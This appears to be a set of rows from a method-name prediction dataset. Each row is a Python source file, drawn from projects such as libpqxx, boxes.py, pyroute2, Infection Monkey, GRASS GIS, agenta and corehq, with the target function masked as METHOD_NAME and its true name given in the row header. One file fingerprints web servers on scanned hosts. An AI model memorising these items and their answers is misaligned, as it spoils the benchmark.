stderr,
stdout,
)
import sys
from textwrap import dedent
def expand_foreach_file(path, block, outfile):
"""Expand a "foreach" block for a single file path.
Write the results to outfile.
"""
basepath, _ = os.path.splitext(os.path.basename(path))
for line in block:
line = line.replace("###FILENAME###", path)
line = line.replace("###BASENAME###", basepath)
outfile.write(line)
def METHOD_NAME(globs):
"""List all files matching any item in globs.
Eliminates duplicates.
"""
return sorted({
path
for pattern in globs
for path in glob(pattern)
})
def expand_foreach(globs, block, outfile):
"""Expand a foreach block for each file matching one of globs.
Write the results to outfile.
"""
# We'll be iterating over block a variable number of times. Turn it
# from a generic iterable into an immutable array.
block = tuple(block)
for path in METHOD_NAME(globs):
expand_foreach_file(path, block, outfile)
# Header to be prefixed to the generated file.
OUTPUT_HEADER = dedent("""\
# AUTOMATICALLY GENERATED FILE -- DO NOT EDIT.
#
# This file is generated automatically by libpqxx's {script} script, and
# will be rewritten from time to time.
#
# If you modify this file, chances are your modifications will be lost.
#
# The {script} script should be available in the tools directory of the
# libpqxx source archive.
""")
foreach_marker = r"###MAKTEMPLATE:FOREACH "
end_foreach_marker = r"###MAKTEMPLATE:ENDFOREACH"
def parse_foreach(line):
"""Parse FOREACH directive, if line contains one.
:param line: One line of template input.
:return: A list of FOREACH globs, or None if this was not a FOREACH line.
"""
line = line.strip()
if line.startswith(foreach_marker):
return line[len(foreach_marker):].split(',')
else:
return None
def read_foreach_block(infile):
"""Read a FOREACH block from infile (not including the FOREACH directive).
Assumes that the FOREACH directive was in the preceding line. Consumes
the line with the ENDFOREACH directive, but does not yield it.
:return: Iterable of lines.
"""
for line in infile:
if line.strip().startswith(end_foreach_marker):
return
yield line
def expand_template(infile, outfile):
"""Expand the template in infile, and write the results to outfile."""
for line in infile:
globs = parse_foreach(line)
if globs is None:
# Not a FOREACH line. Copy to output.
outfile.write(line)
else:
block = read_foreach_block(infile)
expand_foreach(globs, block, outfile)
@contextmanager
def open_stream(path=None, default=None, mode='r'):
"""Open file at given path, or yield default. Close as appropriate.
The default should be a stream, not a path; closing the context will not
close it.
"""
if path is None:
yield default
else:
with open(path, mode) as stream:
yield stream
def parse_args():
"""Parse command-line arguments.
:return: Tuple of: input path (or None for stdin), output path (or None
for stdout).
"""
parser = ArgumentParser(
description=__doc__, formatter_class=RawDescriptionHelpFormatter)
parser.add_argument(
'template', nargs='?',
help="Input template. Defaults to standard input.")
parser.add_argument(
'output', nargs='?',
help="Output file. Defaults to standard output.")
args = parser.parse_args()
return args.template, args.output
def write_header(stream, template_path=None):
"""Write header to stream."""
hr = ('# ' + '#' * 78) + "\n"
script = os.path.basename(argv[0])
outstream.write(hr)
outstream.write(OUTPUT_HEADER.format(script=script))
if template_path is not None:
outstream.write("#\n")
outstream.write("# Generated from template '%s'.\n" % template_path)
outstream.write(hr)
if __name__ == '__main__':
try:
template_path, output_path = parse_args()
except ArgumentError as error:
stderr.write('%s\n' % error)
sys.exit(2)
input_stream = open_stream(template_path, stdin, 'r')
output_stream = open_stream(output_path, stdout, 'w')
with input_stream as instream, output_stream as outstream:
write_header(outstream, template_path)
expand_template(instream, outstream) |
298,443 | support wall | #!/usr/bin/env python3
# Copyright (C) 2013-2019 Florian Festi
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from boxes import *
from boxes.walledges import _WallMountedBox
class PinEdge(edges.BaseEdge):
def __call__(self, length, **kw):
w2 = self.settings.pinwidth/2
l = self.settings.pinlength
s = self.settings.pinspacing
inc = self.settings.pinspacing_increment
t = self.settings.thickness
pin = [0, -90, l+t-w2, (180, w2), l+t-w2, -90]
self.edge(s/2-w2)
s += inc/2
for i in range(self.pins-1):
self.polyline(*pin, s-2*w2)
s+=inc
self.polyline(*pin, s/2-w2-inc/4)
def margin(self) -> float:
return self.settings.thickness+self.settings.pinlength
class WallPinRow(_WallMountedBox):
"""Outset and angled plate to mount stuff to"""
def __init__(self) -> None:
super().__init__()
self.argparser.add_argument(
"--pins", action="store", type=int, default=8,
help="number of pins")
self.argparser.add_argument(
"--pinlength", action="store", type=float, default=35,
help="length of pins (in mm)")
self.argparser.add_argument(
"--pinwidth", action="store", type=float, default=10,
help="width of pins (in mm)")
self.argparser.add_argument(
"--pinspacing", action="store", type=float, default=35,
help="space from middle to middle of pins (in mm)")
self.argparser.add_argument(
"--pinspacing_increment", action="store", type=float, default=0.0,
help="increase spacing from left to right (in mm)")
self.argparser.add_argument(
"--angle", action="store", type=float, default=20.0,
help="angle of the pins pointing up (in degrees)")
self.argparser.add_argument(
"--hooks", action="store", type=int, default=3,
help="number of hooks into the wall")
self.argparser.add_argument(
"--h", action="store", type=float, default=50.0,
help="height of the front plate (in mm) - needs to be at least 7 time the thickness")
def frontCB(self):
s = self.pinspacing
inc = self.pinspacing_increment
t = self.thickness
pos = s/2
s += 0.5*inc
for i in range(self.pins):
self.rectangularHole(pos, 2*t, self.pinwidth, t)
pos += s
s+=inc
for i in range(1, self.hooks-1):
self.fingerHolesAt(i*self.x/(self.hooks-1), self.h/2, self.h/2)
def backCB(self):
t = self.thickness
self.fingerHolesAt(0, 2*t, self.x, 0)
if self.angle < 0.001:
return
for i in range(1, self.hooks-1):
self.fingerHolesAt(i*self.x/(self.hooks-1), 3*t, self.h/2-3*t)
def sideWall(self, move=None):
a = self.angle
ar = math.radians(a)
h = self.h
t = self.thickness
sh = math.sin(ar)*6*t + math.cos(ar)*h
tw = self.edges["a"].margin() + math.sin(ar)*h + math.cos(ar)*6*t
th = sh + 6
if self.move(tw, th, move, True):
return
self.moveTo(self.edges["a"].margin())
self.polyline(math.sin(ar)*h, a, 4*t)
self.fingerHolesAt(-3.5*t, 0, h/2, 90)
self.edgeCorner("e", "h")
self.edges["h"](h)
self.polyline(0, 90-a, math.cos(ar)*6*t, 90)
self.edges["a"](sh)
self.corner(90)
self.move(tw, th, move)
def METHOD_NAME(self, move=None):
a = self.angle
ar = math.radians(a)
h = self.h
t = self.thickness
sh = math.sin(ar)*6*t + math.cos(ar)*h
tw = self.edges["a"].margin() + max(
math.sin(ar)*h/2 + math.cos(ar)*5*t,
math.sin(ar)*h)
th = sh + 6
if self.move(tw, th, move, True):
return
self.moveTo(self.edges["a"].margin())
if a > 0.001:
self.polyline(math.sin(ar)*h, a+90, 3*t)
self.edges["f"](h/2-3*t)
self.polyline(0, -90)
self.polyline(4*t, 90)
self.edges["f"](h/2)
self.polyline(math.sin(ar)*2*t, 90-a,
math.cos(ar)*4*t - math.sin(ar)**2*2*t, 90)
if a > 0.001:
self.edges["a"](sh)
else:
self.edges["a"](h/2)
self.corner(90)
self.move(tw, th, move)
def render(self):
self.generateWallEdges()
p = PinEdge(self, self)
n = self.pins
t = self.thickness
if self.h < 7*t:
self.h = 7*t
self.x = x = n*self.pinspacing + (n)*(n-1)/2 *self.pinspacing_increment
self.rectangularWall(x, 3*t, [p, "e", "f", "e"], move="up")
self.rectangularWall(x, self.h, "efef", callback=[self.frontCB],
move="up")
self.rectangularWall(x, self.h/2, "efef", callback=[self.backCB],
move="up")
self.sideWall(move="right")
for i in range(self.hooks-2):
self.METHOD_NAME(move="right")
self.sideWall(move="right") |
298,444 | free network | import errno
import os
import platform
import pwd
import re
import stat
import subprocess
import sys
import uuid
from socket import AF_INET, AF_INET6
import netaddr
import pytest
from pyroute2 import config
from pyroute2.iproute.linux import IPRoute
try:
import httplib
except ImportError:
import http.client as httplib
dtcd_uuid = str(uuid.uuid4())
# check the dtcd
try:
cx = httplib.HTTPConnection('localhost:7623')
cx.request('GET', '/v1/network/')
cx.getresponse()
has_dtcd = True
except:
has_dtcd = False
supernet = {
AF_INET: netaddr.IPNetwork('172.16.0.0/12'),
AF_INET6: netaddr.IPNetwork('fdb3:84e5:4ff4::/48'),
}
network_pool = {
AF_INET: list(supernet[AF_INET].subnet(24)),
AF_INET6: list(supernet[AF_INET6].subnet(64)),
}
allocations = {}
family_url = {AF_INET: 'ipv4', AF_INET6: 'ipv6'}
def allocate_network(family=AF_INET):
global dtcd_uuid
global network_pool
global allocations
network = None
try:
cx = httplib.HTTPConnection('localhost:7623')
cx.request(
'POST', '/v1/network/%s/' % family_url[family], body=dtcd_uuid
)
resp = cx.getresponse()
if resp.status == 200:
network = netaddr.IPNetwork(resp.read().decode('utf-8'))
cx.close()
except Exception:
pass
if network is None:
network = network_pool[family].pop()
allocations[network] = True
return network
def METHOD_NAME(network, family=AF_INET):
global network_pool
global allocations
if network in allocations:
allocations.pop(network)
network_pool[family].append(network)
else:
cx = httplib.HTTPConnection('localhost:7623')
cx.request(
'DELETE', '/v1/network/%s/' % family_url[family], body=str(network)
)
cx.getresponse()
cx.close()
def conflict_arch(arch):
if platform.machine().find(arch) >= 0:
pytest.skip('conflict with architecture %s' % (arch))
def kernel_version_ge(major, minor):
# True if running kernel is >= X.Y
if config.kernel[0] > major:
return True
if config.kernel[0] < major:
return False
if minor and config.kernel[1] < minor:
return False
return True
def require_kernel(major, minor=None):
if not kernel_version_ge(major, minor):
pytest.skip('incompatible kernel version')
def require_python(target):
if sys.version_info[0] != target:
pytest.skip('test requires Python %i' % target)
def require_8021q():
try:
os.stat('/proc/net/vlan/config')
except OSError as e:
# errno 2 'No such file or directory'
if e.errno == 2:
pytest.skip('missing 8021q support, or module is not loaded')
raise
def require_bridge():
with IPRoute() as ip:
try:
ip.link('add', ifname='test_req', kind='bridge')
except Exception:
pytest.skip('can not create <bridge>')
idx = ip.link_lookup(ifname='test_req')
if not idx:
pytest.skip('can not create <bridge>')
ip.link('del', index=idx)
def require_bond():
with IPRoute() as ip:
try:
ip.link('add', ifname='test_req', kind='bond')
except Exception:
pytest.skip('can not create <bond>')
idx = ip.link_lookup(ifname='test_req')
if not idx:
pytest.skip('can not create <bond>')
ip.link('del', index=idx)
def require_user(user):
if bool(os.environ.get('PYROUTE2_TESTS_RO', False)):
pytest.skip('read-only tests requested')
if pwd.getpwuid(os.getuid()).pw_name != user:
pytest.skip('required user %s' % (user))
def require_executable(name):
try:
with open(os.devnull, 'w') as fnull:
subprocess.check_call(['which', name], stdout=fnull, stderr=fnull)
except Exception:
pytest.skip('required %s not found' % (name))
def remove_link(name):
if os.getuid() != 0:
return
with open(os.devnull, 'w') as fnull:
subprocess.call(
['ip', 'link', 'del', 'dev', name], stdout=fnull, stderr=fnull
)
while True:
links = get_ip_link()
if name not in links:
break
def create_link(name, kind):
if os.getuid() != 0:
return
subprocess.call(['ip', 'link', 'add', 'dev', name, 'type', kind])
for i in range(20):
links = get_ip_link()
if name in links:
return
raise Exception("interface not created")
def _check_output(*argv):
# we can not use check_output, as it does not exist in 2.6
process = subprocess.Popen(argv, stdout=subprocess.PIPE)
ret = process.communicate()
return ret[0].decode('utf-8').split('\n')
def grep(command, pattern=None):
out = _check_output(*command.split())
ret = []
reg = re.compile(pattern)
for string in out:
if reg.search(string):
ret.append(string)
return ret
def get_ip_addr(interface=None):
argv = ['ip', '-o', 'ad']
if interface:
argv.extend(['li', 'dev', interface])
out = _check_output(*argv)
ret = []
for string in out:
fields = string.split()
if len(fields) >= 5 and fields[2][:4] == 'inet':
ret.append(fields[3])
return ret
def get_ip_brd(interface=None):
argv = ['ip', '-o', 'ad']
if interface:
argv.extend(['li', 'dev', interface])
out = _check_output(*argv)
ret = []
for string in out:
fields = string.split()
if len(fields) >= 5 and fields[4] == 'brd':
ret.append(fields[5])
return ret
def get_ip_link():
ret = []
out = _check_output('ip', '-o', 'li')
for string in out:
fields = string.split()
if len(fields) >= 2:
ret.append(fields[1][:-1].split('@')[0])
return ret
def get_ip_default_routes():
ret = []
out = _check_output('ip', '-4', 'ro')
for string in out:
if 'default' in string:
ret.append(string)
return ret
def get_ip_rules(proto='-4'):
ret = []
out = _check_output('ip', proto, 'rule', 'show')
for string in out:
if len(string):
ret.append(string)
return ret
def count_socket_fds():
pid_fd = '/proc/%s/fd' % os.getpid()
sockets = 0
for fd in os.listdir(pid_fd):
try:
if stat.S_ISSOCK(os.stat(os.path.join(pid_fd, fd)).st_mode):
sockets += 1
except OSError as e:
if e.errno != errno.ENOENT:
raise
return sockets |
298,445 | set rules |
from BaseClasses import MultiWorld
from .Items import exclusionItem_table
from .Locations import STT_Checks, exclusion_table
from .Names import LocationName, ItemName
from ..generic.Rules import add_rule, forbid_items, set_rule
def METHOD_NAME(world: MultiWorld, player: int):
add_rule(world.get_location(LocationName.RoxasDataMagicBoost, player),
lambda state: state.kh_dataroxas(player))
add_rule(world.get_location(LocationName.DemyxDataAPBoost, player),
lambda state: state.kh_datademyx(player))
add_rule(world.get_location(LocationName.SaixDataDefenseBoost, player),
lambda state: state.kh_datasaix(player))
add_rule(world.get_location(LocationName.XaldinDataDefenseBoost, player),
lambda state: state.kh_dataxaldin(player))
add_rule(world.get_location(LocationName.XemnasDataPowerBoost, player),
lambda state: state.kh_dataxemnas(player))
add_rule(world.get_location(LocationName.XigbarDataDefenseBoost, player),
lambda state: state.kh_dataxigbar(player))
add_rule(world.get_location(LocationName.VexenDataLostIllusion, player),
lambda state: state.kh_dataaxel(player))
add_rule(world.get_location(LocationName.LuxordDataAPBoost, player),
lambda state: state.kh_dataluxord(player))
for slot, weapon in exclusion_table["WeaponSlots"].items():
add_rule(world.get_location(slot, player), lambda state: state.has(weapon, player))
formLogicTable = {
ItemName.ValorForm: [LocationName.Valorlvl4,
LocationName.Valorlvl5,
LocationName.Valorlvl6,
LocationName.Valorlvl7],
ItemName.WisdomForm: [LocationName.Wisdomlvl4,
LocationName.Wisdomlvl5,
LocationName.Wisdomlvl6,
LocationName.Wisdomlvl7],
ItemName.LimitForm: [LocationName.Limitlvl4,
LocationName.Limitlvl5,
LocationName.Limitlvl6,
LocationName.Limitlvl7],
ItemName.MasterForm: [LocationName.Masterlvl4,
LocationName.Masterlvl5,
LocationName.Masterlvl6,
LocationName.Masterlvl7],
ItemName.FinalForm: [LocationName.Finallvl4,
LocationName.Finallvl5,
LocationName.Finallvl6,
LocationName.Finallvl7]
}
for form in formLogicTable:
for i in range(4):
location = world.get_location(formLogicTable[form][i], player)
set_rule(location, lambda state, i=i + 1, form=form: state.kh_amount_of_forms(player, i, form))
if world.Goal[player] == "three_proofs":
add_rule(world.get_location(LocationName.FinalXemnas, player),
lambda state: state.kh_three_proof_unlocked(player))
if world.FinalXemnas[player]:
world.completion_condition[player] = lambda state: state.kh_victory(player)
else:
world.completion_condition[player] = lambda state: state.kh_three_proof_unlocked(player)
# lucky emblem hunt
elif world.Goal[player] == "lucky_emblem_hunt":
add_rule(world.get_location(LocationName.FinalXemnas, player),
lambda state: state.kh_lucky_emblem_unlocked(player, world.LuckyEmblemsRequired[player].value))
if world.FinalXemnas[player]:
world.completion_condition[player] = lambda state: state.kh_victory(player)
else:
world.completion_condition[player] = lambda state: state.kh_lucky_emblem_unlocked(player, world.LuckyEmblemsRequired[player].value)
# hitlist if == 2
else:
add_rule(world.get_location(LocationName.FinalXemnas, player),
lambda state: state.kh_hitlist(player, world.BountyRequired[player].value))
if world.FinalXemnas[player]:
world.completion_condition[player] = lambda state: state.kh_victory(player)
else:
world.completion_condition[player] = lambda state: state.kh_hitlist(player, world.BountyRequired[player].value)
# Forbid Abilities on popups due to game limitations
for location in exclusion_table["Popups"]:
forbid_items(world.get_location(location, player), exclusionItem_table["Ability"])
forbid_items(world.get_location(location, player), exclusionItem_table["StatUps"])
for location in STT_Checks:
forbid_items(world.get_location(location, player), exclusionItem_table["StatUps"])
# Santa's house also breaks with stat ups
for location in {LocationName.SantasHouseChristmasTownMap, LocationName.SantasHouseAPBoost}:
forbid_items(world.get_location(location, player), exclusionItem_table["StatUps"])
add_rule(world.get_location(LocationName.TransporttoRemembrance, player),
lambda state: state.kh_transport(player)) |
298,446 | get host fingerprint | import logging
import time
from contextlib import closing
from http import HTTPMethod
from ipaddress import IPv4Address
from typing import Dict, Optional, Sequence, Set
from requests import head
from requests.exceptions import ConnectionError, Timeout
from requests.structures import CaseInsensitiveDict
from common.agent_events import FingerprintingEvent, HTTPRequestEvent
from common.event_queue import IAgentEventPublisher
from common.tags import ACTIVE_SCANNING_T1595_TAG, GATHER_VICTIM_HOST_INFORMATION_T1592_TAG
from common.types import (
AgentID,
DiscoveredService,
NetworkPort,
NetworkProtocol,
NetworkService,
PortStatus,
)
from infection_monkey.i_puppet import FingerprintData, IFingerprinter, PingScanData, PortScanData
logger = logging.getLogger(__name__)
HTTP_FINGERPRINTER_TAG = "http-fingerprinter"
EVENT_TAGS = frozenset(
{HTTP_FINGERPRINTER_TAG, ACTIVE_SCANNING_T1595_TAG, GATHER_VICTIM_HOST_INFORMATION_T1592_TAG}
)
class HTTPFingerprinter(IFingerprinter):
"""
Queries potential HTTP(S) ports and attempt to determine the server software that handles the
HTTP requests.
"""
def __init__(self, agent_id: AgentID, agent_event_publisher: IAgentEventPublisher):
self._agent_id = agent_id
self._agent_event_publisher = agent_event_publisher
def METHOD_NAME(
self,
host: str,
_: PingScanData,
port_scan_data: Dict[int, PortScanData],
options: Dict,
) -> FingerprintData:
services = []
http_ports = set(options.get("http_ports", []))
ports_to_fingerprint = _get_open_http_ports(http_ports, port_scan_data)
timestamp = time.time()
for port in ports_to_fingerprint:
service = self._query_potential_http_server(host, port)
if service:
services.append(
DiscoveredService(
protocol=NetworkProtocol.TCP, port=NetworkPort(port), service=service
)
)
# If there were no ports worth fingerprinting (i.e. no actual fingerprinting action took
# place), then we don't want to publish an event.
if len(ports_to_fingerprint) > 0:
self._publish_fingerprinting_event(host, timestamp, services)
return FingerprintData(os_type=None, os_version=None, services=services)
def _query_potential_http_server(self, host: str, port: int) -> Optional[NetworkService]:
# check both http and https
http = f"http://{host}:{port}"
https = f"https://{host}:{port}"
for url, ssl in ((https, True), (http, False)): # start with https and downgrade
server_header = self._get_server_from_headers(host, url)
if server_header is not None:
return NetworkService.HTTPS if ssl else NetworkService.HTTP
return None
def _get_server_from_headers(self, host: str, url: str) -> Optional[str]:
timestamp = time.time()
headers = _get_http_headers(url)
self._publish_http_request_event(host, timestamp, url)
if headers:
return headers.get("Server", "")
return None
def _publish_http_request_event(self, host: str, timestamp: float, url: str):
self._agent_event_publisher.publish(
HTTPRequestEvent(
source=self._agent_id,
target=IPv4Address(host),
timestamp=timestamp,
tags=EVENT_TAGS, # type: ignore [arg-type]
method=HTTPMethod.HEAD,
url=url, # type: ignore [arg-type]
)
)
def _publish_fingerprinting_event(
self, host: str, timestamp: float, discovered_services: Sequence[DiscoveredService]
):
self._agent_event_publisher.publish(
FingerprintingEvent(
source=self._agent_id,
target=IPv4Address(host),
timestamp=timestamp,
tags=EVENT_TAGS, # type: ignore [arg-type]
os=None,
os_version=None,
discovered_services=tuple(discovered_services),
)
)
def _get_open_http_ports(
allowed_http_ports: Set, port_scan_data: Dict[int, PortScanData]
) -> Sequence[int]:
open_ports = (psd.port for psd in port_scan_data.values() if psd.status == PortStatus.OPEN)
return [port for port in open_ports if port in allowed_http_ports]
def _get_http_headers(url: str) -> Optional[CaseInsensitiveDict]:
try:
logger.debug(f"Sending request for headers to {url}")
with closing(head(url, verify=False, timeout=1)) as response: # noqa: DUO123
return response.headers
except Timeout:
logger.debug(f"Timeout while requesting headers from {url}")
except ConnectionError: # Someone doesn't like us
logger.debug(f"Connection error while requesting headers from {url}")
return None |
298,447 | switch mapset | # MODULE: grass.jupyter.setup
#
# AUTHOR(S): Caitlin Haedrich <caitlin DOT haedrich AT gmail>
# Vaclav Petras <wenzeslaus gmail com>
#
# PURPOSE: This module contains functions for launching a GRASS session
# in Jupyter Notebooks
#
# COPYRIGHT: (C) 2021-2022 Caitlin Haedrich, and by the GRASS Development Team
#
# This program is free software under the GNU General Public
# License (>=v2). Read the file COPYING that comes with GRASS
# for details.
"""Initialization GRASS GIS session and its finalization"""
import os
import weakref
import grass.script as gs
def _set_notebook_defaults():
"""Set defaults appropriate for Jupyter Notebooks.
This function sets several GRASS environment variables that are
important for GRASS to run smoothly in Jupyter.
It also allows GRASS to overwrite existing maps of the same name.
"""
# We want functions to raise exceptions and see standard output of
# the modules in the notebook.
gs.set_raise_on_error(True)
gs.set_capture_stderr(True)
# Allow overwrite of existing maps
os.environ["GRASS_OVERWRITE"] = "1"
class _JupyterGlobalSession:
"""Represents a global GRASS session for Jupyter Notebooks.
Do not create objects of this class directly. Use the standalone *init* function
and an object will be returned to you, e.g.:
>>> import grass.jupyter as gj
>>> session = gj.init(...)
An object ends the session when it is destroyed or when the *finish* method is
called explicitly.
Notably, only the mapset is closed, but the libraries and GRASS modules
remain on path.
"""
def __init__(self):
self._finalizer = weakref.finalize(self, gs.setup.finish)
def METHOD_NAME(self, path, location=None, mapset=None):
"""Switch to a mapset provided as a name or path.
The mapset can be provided as a name, as a path,
or as database, location, and mapset.
Specifically, the *path* positional-only parameter can be either
name of a mapset in the current location or a full path to a mapset.
When location and mapset are provided using the additional parameters,
the *path* parameter is path to a database.
Raises ValueError if the mapset does not exist (e.g., when the name is
misspelled or the mapset is invalid).
"""
# The method could be a function, but this is more general (would work even for
# a non-global session).
# pylint: disable=no-self-use
# Functions needed only here.
# pylint: disable=import-outside-toplevel
from grass.grassdb.checks import (
get_mapset_invalid_reason,
is_mapset_valid,
mapset_exists,
)
from grass.grassdb.manage import resolve_mapset_path
# For only one parameter, try if it is a mapset in the current location to
# support switching only by its name.
gisenv = gs.gisenv()
if (
not location
and not mapset
and mapset_exists(
path=gisenv["GISDBASE"], location=gisenv["LOCATION_NAME"], mapset=path
)
):
gs.run_command("g.gisenv", set=f"MAPSET={path}")
return
mapset_path = resolve_mapset_path(path=path, location=location, mapset=mapset)
if not is_mapset_valid(mapset_path):
raise ValueError(
_("Mapset {path} is not valid: {reason}").format(
path=mapset_path.path,
reason=get_mapset_invalid_reason(
mapset_path.directory, mapset_path.location, mapset_path.mapset
),
)
)
# This requires direct session file modification using g.gisenv because
# g.mapset locks the mapset which is not how init and finish behave.
# For code simplicity, we just change all even when only mapset is changed.
gs.run_command("g.gisenv", set=f"GISDBASE={mapset_path.directory}")
gs.run_command("g.gisenv", set=f"LOCATION_NAME={mapset_path.location}")
gs.run_command("g.gisenv", set=f"MAPSET={mapset_path.mapset}")
def finish(self):
"""Close the session, i.e., close the open mapset.
Subsequent calls to GRASS GIS modules will fail because there will be
no current (open) mapset anymore.
The finish procedure is done automatically when process finishes or the object
is destroyed.
"""
self._finalizer()
@property
def active(self):
"""True unless the session was finalized (e.g., with the *finish* function)"""
return self._finalizer.alive
# Pylint 2.12.2 identifies this a constant (although it is not), so it wants uppercase.
_global_session_handle = None # pylint: disable=invalid-name
def init(path, location=None, mapset=None, grass_path=None):
"""Initiates a GRASS session and sets GRASS environment variables.
Calling this function returns an object which represents the session.
>>> import grass.jupyter as gj
>>> session = gj.init(...)
The session is ended when `session.finish` is called or when the object is
destroyed when kernel ends or restarts. This function returns a copy of an
internally kept reference, so the return value can be safely ignored when not
needed.
The returned object can be used to switch to another mapset:
>>> session.switch_mapset("mapset_name")
Subsequent calls to the *init* function result in switching the mapset if
a session is active and result in creation of new session if it is not active.
On the other hand, if you see ``GISRC - variable not set`` after calling
a GRASS module, you know you don't have an active GRASS session.
:param str path: path to GRASS mapset or database
:param str location: name of GRASS location within the database
:param str mapset: name of mapset within location
"""
global _global_session_handle # pylint: disable=global-statement,invalid-name
if not _global_session_handle or not _global_session_handle.active:
# Create a GRASS session.
gs.setup.init(path, location=location, mapset=mapset, grass_path=grass_path)
# Set defaults for environmental variables and library.
_set_notebook_defaults()
_global_session_handle = _JupyterGlobalSession()
else:
_global_session_handle.METHOD_NAME(path, location=location, mapset=mapset)
return _global_session_handle |
298,448 | send docker tar | import os
from pathlib import Path
from typing import List
import agenta.config
import requests
from agenta.client.api_models import AppVariant, Image
from docker.models.images import Image as DockerImage
BACKEND_URL_SUFFIX = os.environ["BACKEND_URL_SUFFIX"]
class APIRequestError(Exception):
"""Exception to be raised when an API request fails."""
def add_variant_to_server(app_name: str, variant_name: str, image: Image, host: str):
"""Adds a variant to the server.
Arguments:
app_name -- Name of the app
variant_name -- Name of the variant
image_name -- Name of the image
"""
app_variant: AppVariant = AppVariant(app_name=app_name, variant_name=variant_name)
response = requests.post(
f"{host}/{BACKEND_URL_SUFFIX}/app_variant/add/from_image/",
json={"app_variant": app_variant.dict(), "image": image.dict()},
timeout=600,
)
if response.status_code != 200:
error_message = response.json()
raise APIRequestError(
f"Request to app_variant endpoint failed with status code {response.status_code} and error message: {error_message}."
)
def start_variant(app_name: str, variant_name: str, host: str) -> str:
"""Starts a container with the variant an expose its endpoint
Arguments:
app_name --
variant_name -- _description_
Returns:
The endpoint of the container
"""
response = requests.post(
f"{host}/{BACKEND_URL_SUFFIX}/app_variant/start/",
json={"app_variant": {"app_name": app_name, "variant_name": variant_name}},
timeout=600,
)
if response.status_code != 200:
error_message = response.json()
raise APIRequestError(
f"Request to start variant endpoint failed with status code {response.status_code} and error message: {error_message}."
)
return response.json()["uri"]
def list_variants(app_name: str, host: str) -> List[AppVariant]:
"""Lists all the variants registered in the backend for an app
Arguments:
app_name -- the app name to which to return all the variants
Returns:
a list of the variants using the pydantic model
"""
response = requests.get(
f"{host}/{BACKEND_URL_SUFFIX}/app_variant/list_variants/?app_name={app_name}",
timeout=600,
)
# Check for successful request
if response.status_code != 200:
error_message = response.json()
raise APIRequestError(
f"Request to list_variants endpoint failed with status code {response.status_code} and error message: {error_message}."
)
app_variants = response.json()
return [AppVariant(**variant) for variant in app_variants]
def get_variant_by_name(app_name: str, variant_name: str, host: str) -> AppVariant:
"""Gets a variant by name
Arguments:
app_name -- the app name
variant_name -- the variant name
Returns:
the variant using the pydantic model
"""
response = requests.get(
f"{host}/{BACKEND_URL_SUFFIX}/app_variant/get_variant_by_name/?app_name={app_name}&variant_name={variant_name}",
timeout=600,
)
# Check for successful request
if response.status_code != 200:
error_message = response.json()
raise APIRequestError(
f"Request to get_variant_by_name endpoint failed with status code {response.status_code} and error message: {error_message}."
)
def remove_variant(app_name: str, variant_name: str, host: str):
"""Removes a variant from the backend
Arguments:
app_name -- the app name
variant_name -- the variant name
"""
app_variant = AppVariant(app_name=app_name, variant_name=variant_name)
app_variant_json = app_variant.json()
response = requests.delete(
f"{host}/{BACKEND_URL_SUFFIX}/app_variant/remove_variant/",
data=app_variant_json,
headers={"Content-Type": "application/json"},
timeout=600,
)
# Check for successful request
if response.status_code != 200:
error_message = response.json()
raise APIRequestError(
f"Request to remove_variant endpoint failed with status code {response.status_code} and error message: {error_message}"
)
def update_variant_image(app_name: str, variant_name: str, image: Image, host: str):
"""Adds a variant to the server.
Arguments:
app_name -- Name of the app
variant_name -- Name of the variant
image_name -- Name of the image
"""
app_variant: AppVariant = AppVariant(app_name=app_name, variant_name=variant_name)
response = requests.put(
f"{host}/{BACKEND_URL_SUFFIX}/app_variant/update_variant_image/",
json={"app_variant": app_variant.dict(), "image": image.dict()},
timeout=600,
)
if response.status_code != 200:
error_message = response.json()
raise APIRequestError(
f"Request to update app_variant failed with status code {response.status_code} and error message: {error_message}."
)
def METHOD_NAME(
app_name: str, variant_name: str, tar_path: Path, host: str
) -> Image:
with tar_path.open("rb") as tar_file:
response = requests.post(
f"{host}/{BACKEND_URL_SUFFIX}/containers/build_image/?app_name={app_name}&variant_name={variant_name}",
files={
"tar_file": tar_file,
},
timeout=1200,
)
if response.status_code == 500:
response_error = response.json()
error_msg = "Serving the variant failed.\n"
error_msg += f"Log: {response_error}\n"
error_msg += "Here's how you may be able to solve the issue:\n"
error_msg += "- First, make sure that the requirements.txt file has all the dependencies that you need.\n"
error_msg += "- Second, check the Docker logs for the backend image to see the error when running the Docker container."
raise Exception(error_msg)
response.raise_for_status()
image = Image.parse_obj(response.json())
return image |
298,449 | get relevant aws meta | import logging
from django.conf import settings
from django.utils.dateparse import parse_datetime
from corehq.util.metrics import metrics_counter
from corehq.util.models import (
NotificationType,
AwsMeta,
BounceType,
BouncedEmail,
PermanentBounceMeta,
ComplaintBounceMeta,
TransientBounceEmail,
)
def log_email_sns_event(message):
log_event = {
'eventType': message.get('eventType'),
'eventTimestamp': message.get('mail', {}).get('timestamp'),
'commonHeaders': message.get('mail', {}).get('commonHeaders')
}
for key in ['bounce', 'complaint', 'delivery', 'reject', 'failure', 'deliveryDelay']:
if key in message:
log_event[key] = message.get(key)
logging.info(log_event)
def handle_email_sns_event(message):
"""
This expects message to be the "Message" portion of an AWS SNS Notification as
sent by Amazon SNS, as described here:
https://docs.aws.amazon.com/ses/latest/DeveloperGuide/event-publishing-retrieving-sns-examples.html
:param message:
:return:
"""
for aws_meta in METHOD_NAME(message):
if aws_meta.notification_type == NotificationType.BOUNCE:
if aws_meta.main_type == BounceType.PERMANENT:
record_permanent_bounce(aws_meta)
metrics_counter('commcare.email_sns_event.permanent_bounce_recorded')
elif aws_meta.main_type == BounceType.TRANSIENT:
record_transient_bounce(aws_meta)
metrics_counter('commcare.email_sns_event.transient_bounce_recorded')
elif aws_meta.main_type == BounceType.UNDETERMINED:
record_permanent_bounce(aws_meta)
metrics_counter('commcare.email_sns_event.undetermined_bounce_received')
elif aws_meta.notification_type == NotificationType.COMPLAINT:
record_complaint(aws_meta)
metrics_counter('commcare.email_sns_event.complaint_recorded')
log_email_sns_event(message)
def record_permanent_bounce(aws_meta):
bounced_email, _ = BouncedEmail.objects.update_or_create(
email=aws_meta.email,
)
exists = PermanentBounceMeta.objects.filter(
